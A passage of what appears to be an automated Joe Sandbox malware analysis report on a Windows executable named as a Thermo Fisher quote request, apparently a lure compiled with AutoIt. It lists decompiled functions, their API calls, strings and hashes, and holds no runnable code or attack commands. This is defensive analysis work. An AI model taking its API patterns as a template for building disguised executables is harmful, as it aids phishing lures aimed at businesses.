                                                              • Opcode ID: 0637434fde68084997fdcd75e7dc509799036d70fcdc6f9f58a828bb586cb5b1
                                                              • Instruction ID: 92f2f474de3c715101df0ac3a5b38ad6c75bdd2b7f402766da55d49b0db7cacf
                                                              • Opcode Fuzzy Hash: 0637434fde68084997fdcd75e7dc509799036d70fcdc6f9f58a828bb586cb5b1
                                                              • Instruction Fuzzy Hash: 7E0148B0901B597DE3008F6A8C85A52FFA8FF15354F00421B915C47941C7B5A864CBE5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 62977462a2a2ca4288a95e8f82fe49afe543be428f5fd6bc42583ee047fd1590
                                                              • Instruction ID: c183569cbccaae90216211f64ae0dfa8d0a879f65ab1cf2e1e175dd9fb087bea
                                                              • Opcode Fuzzy Hash: 62977462a2a2ca4288a95e8f82fe49afe543be428f5fd6bc42583ee047fd1590
                                                              • Instruction Fuzzy Hash: 55018132182211BBDB652B54EC58DEB777BFF89711B041629F603922E4DB749940DB70
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00647C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00647C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00647C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00647C4C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 146745766daad7e0827cf15c50664d954bfecc8371fa89c3b6edf4d9bcf75778
                                                              • Instruction ID: 85b291f9acaa87fb945acf563c9e596d53b4e2d1704208108c4f57bfebf1596e
                                                              • Opcode Fuzzy Hash: 146745766daad7e0827cf15c50664d954bfecc8371fa89c3b6edf4d9bcf75778
                                                              • Instruction Fuzzy Hash: 57F03A72241158BBE7215B529C0EEEF7B7DEFC6B21F000218FA01D1191E7A05A81C7B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00649A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A5E
                                                                • Part of subcall function 006493D1: CloseHandle.KERNEL32(?,?,00649A6B,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 006493DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00649A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00675DEE,?,?,?,?,?,0060ED63), ref: 00649A78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 493d52aa37eb66040c6cadaa4d77ab3fd2231a85d5079cd7d90ee08fae559cb1
                                                              • Instruction ID: b3a758c7f0a2854aa177535c916e13e4efb7304cf5dc45a43b3881b363d2c590
                                                              • Opcode Fuzzy Hash: 493d52aa37eb66040c6cadaa4d77ab3fd2231a85d5079cd7d90ee08fae559cb1
                                                              • Instruction Fuzzy Hash: 3CF05E32181211BBD7512BA4EC9DDEB773BFF85311B141625F603911E8DB759A01DB70
                                                              APIs
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • __swprintf.LIBCMT ref: 00601EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00601D49
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              • Opcode ID: e8151045dc5f5b1ca4b1b94feebbf74e2eef984cccf2a934e6c2eabbb675bb4f
                                                              • Instruction ID: 8e51fc96bcb6546b0c8ced1a650d93400ccffbd0caece8589f4b1dfd32bd073a
                                                              • Opcode Fuzzy Hash: e8151045dc5f5b1ca4b1b94feebbf74e2eef984cccf2a934e6c2eabbb675bb4f
                                                              • Instruction Fuzzy Hash: 7D918C711442019FC768EF24C895CAFB7E6AF85710F04492DF8869B2E1DB71ED05CB96
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0065B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 0065B115
                                                              • VariantClear.OLEAUT32(?), ref: 0065B298
                                                                • Part of subcall function 00649DC5: VariantInit.OLEAUT32(00000000), ref: 00649E05
                                                                • Part of subcall function 00649DC5: VariantCopy.OLEAUT32(?,?), ref: 00649E0E
                                                                • Part of subcall function 00649DC5: VariantClear.OLEAUT32(?), ref: 00649E1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: a9c1195127372a1a1d94c695871136027f561debd898a2ad7a530a1bd4cd7c18
                                                              • Instruction ID: 6675e269f272b411451fd0100344863d4974b98690f6d77079637bb63b358ad0
                                                              • Opcode Fuzzy Hash: a9c1195127372a1a1d94c695871136027f561debd898a2ad7a530a1bd4cd7c18
                                                              • Instruction Fuzzy Hash: D5918D706083019FCB54DF24C4819ABB7F6EF89714F04496DF89A9B392DB31E949CB62
                                                              APIs
                                                                • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
                                                              • _memset.LIBCMT ref: 00645438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00645467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00645513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0064553D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: c3d6510ad8294ab3decec7c01cbcaf7e54328a81007e68e6de0094ebaeb9e398
                                                              • Instruction ID: c46408b6ac31441e7e17203a52b39415601e376d33bc43c926b15232b49b2997
                                                              • Opcode Fuzzy Hash: c3d6510ad8294ab3decec7c01cbcaf7e54328a81007e68e6de0094ebaeb9e398
                                                              • Instruction Fuzzy Hash: E751C1716047019BD7599F28C841BBBB7EBEB86750F04062EF896D72D3EB60CD448B92
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0064027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006402B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006402C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00640344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: b0e008e7289235cad80e78ec6eae85f575b32ad8e616a3c7ba692ad0ded3ac37
                                                              • Instruction ID: 5775ba8db7e73aed7f6c839b47354b6144f65b8f6f1ee02b7416ef4764ed86aa
                                                              • Opcode Fuzzy Hash: b0e008e7289235cad80e78ec6eae85f575b32ad8e616a3c7ba692ad0ded3ac37
                                                              • Instruction Fuzzy Hash: F0415EB1600215EFEB06DF54C884B9A7FBAEF44714B1481ADEE099F246D7B1D944CBA0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00645075
                                                              • GetMenuItemInfoW.USER32 ref: 00645091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006450D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C1708,00000000), ref: 00645120
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 762848cd13e91b35e23b718b51f5149e8166681a4b7794cb102d56362921dee2
                                                              • Instruction ID: 56bebc8222bd8db99ae879fc3a9541d87f54bca126c3b0604031ccd0b6371261
                                                              • Opcode Fuzzy Hash: 762848cd13e91b35e23b718b51f5149e8166681a4b7794cb102d56362921dee2
                                                              • Instruction Fuzzy Hash: 4241E234204741AFD720DF24D881B6ABBE6AF8A724F144A5EF856973D2D730E800CB66
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00660587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: 846ffd0f01967865c0d77177cfe994d73282bee8ba1b55ff593e3c93323b61ed
                                                              • Instruction ID: f36b5d25c3bfad4112583168db6ee3b6bceb20b4139c95d5b09572eb2466d92c
                                                              • Opcode Fuzzy Hash: 846ffd0f01967865c0d77177cfe994d73282bee8ba1b55ff593e3c93323b61ed
                                                              • Instruction Fuzzy Hash: 4C31AB70500216ABCF04EF64CC419EFB7BAFF55314B008A2DE826A76D1DB71E956CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0063B88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0063B8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0063B8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 05acf8c082b8e707b4d8d891b5bfffa10ecb3dd54da9a486a8588308af1158bd
                                                              • Instruction ID: 13c675d997a1ec94907d98a5e612cb724a96483911a5ea2808042f64ae414476
                                                              • Opcode Fuzzy Hash: 05acf8c082b8e707b4d8d891b5bfffa10ecb3dd54da9a486a8588308af1158bd
                                                              • Instruction Fuzzy Hash: 4E21E1B1A40108BFDB48AB68D886DFF77BEDF05360F10522DF521A21E1DB744D4697A4
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00654401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00654427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00654457
                                                              • InternetCloseHandle.WININET(00000000), ref: 0065449E
                                                                • Part of subcall function 00655052: GetLastError.KERNEL32(?,?,006543CC,00000000,00000000,00000001), ref: 00655067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              • Opcode ID: 36f1c611bee39654dd4960c4abdf16af66014aa30ee49ea6506f08477a00f147
                                                              • Instruction ID: c2f84b007ebfcfb20fde39a340bb53f80e29036f70b6a86044a7c7af590bddef
                                                              • Opcode Fuzzy Hash: 36f1c611bee39654dd4960c4abdf16af66014aa30ee49ea6506f08477a00f147
                                                              • Instruction Fuzzy Hash: 6321CFB2540208BFE7119F54CC85FBFB7FEEB48759F10815AF90992280EE648D4997B0
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0066915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00669163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00669178
                                                              • DestroyWindow.USER32(?), ref: 00669180
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: dec53eeba646d1611af9a0ba8ad5a2badeafdd6b5e7125303451b6346182b23d
                                                              • Instruction ID: 71c0bf6e4dfb09b38f0d61468b86bb264d604b63b4dbe5a7e1952b359226509c
                                                              • Opcode Fuzzy Hash: dec53eeba646d1611af9a0ba8ad5a2badeafdd6b5e7125303451b6346182b23d
                                                              • Instruction Fuzzy Hash: 69215E7121020ABBEF104E64DD85EFAB7AEEF9A364F200618FD5496290D771DC52A770
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00649588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006495B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 006495CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00649605
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 9584cc68f95a54357d3f779ed9f0b0a167d559054892c379e0a2f0e4b476cfc2
                                                              • Instruction ID: 5687a1e1160d818a8a5c5cbbf413e072301fb58133dfac1379eeecbaa243c35a
                                                              • Opcode Fuzzy Hash: 9584cc68f95a54357d3f779ed9f0b0a167d559054892c379e0a2f0e4b476cfc2
                                                              • Instruction Fuzzy Hash: 55215CB0680205ABEB259F29DC45ADB7BFAAF85720F204A19F9A1D73D0D770D941CB30
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00649653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00649683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00649694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006496CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: db63b99f0e8b97a71c6992ce634c8b6c1d5d836628891954829d962d13c623c6
                                                              • Instruction ID: 94cd617766e466aed3a85987821d5df46a69ab1e434d2a54cf14d77e95bc92ee
                                                              • Opcode Fuzzy Hash: db63b99f0e8b97a71c6992ce634c8b6c1d5d836628891954829d962d13c623c6
                                                              • Instruction Fuzzy Hash: B4217A71680205ABEB209F698C44EDB77AAAF95720F210B18F9A1E33D0E6709D41CB30
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064DB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0064DB5E
                                                              • __swprintf.LIBCMT ref: 0064DB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0069DC00), ref: 0064DBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 679bf65d162c0c2178002902691745c7947bdef9f63e843f057dfe3b1012d23e
                                                              • Instruction ID: 76337d21983d4b7825c2c5d5a03316b82467fd2005eadd57dcfc1506b8f7e90c
                                                              • Opcode Fuzzy Hash: 679bf65d162c0c2178002902691745c7947bdef9f63e843f057dfe3b1012d23e
                                                              • Instruction Fuzzy Hash: 92218375A00108AFCB50EFA4D985DAEBBBAEF89714B004069F505E7391DB70EA41CB65
                                                              APIs
                                                                • Part of subcall function 0063C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0063C84A
                                                                • Part of subcall function 0063C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063C85D
